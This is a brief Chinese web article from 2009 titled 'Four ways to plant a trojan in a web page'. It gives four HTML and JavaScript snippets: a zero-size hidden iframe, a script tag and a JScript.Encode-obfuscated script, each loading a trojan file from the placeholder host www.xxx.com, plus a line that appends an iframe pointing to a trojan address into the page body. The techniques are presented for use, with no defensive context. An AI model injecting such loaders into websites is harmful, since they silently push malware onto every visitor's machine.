打印本文 关闭窗口 | ||||
四种在网页中加种木马的办法 | ||||
作者:陈鹏 文章来源:eNet 点击数 更新时间:2009/9/11 23:14:13 文章录入:陈鹏 责任编辑:陈鹏 | ||||
|
||||
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe> 二、js挂马 <script src=http://www.xxx.com/muma.js></script> 三、js变形加密 <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> muma.txt可改成任意后缀的。 四、不是嵌入了与iframe不同 top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="木马地址"></iframe>'
|
||||
打印本文 关闭窗口 |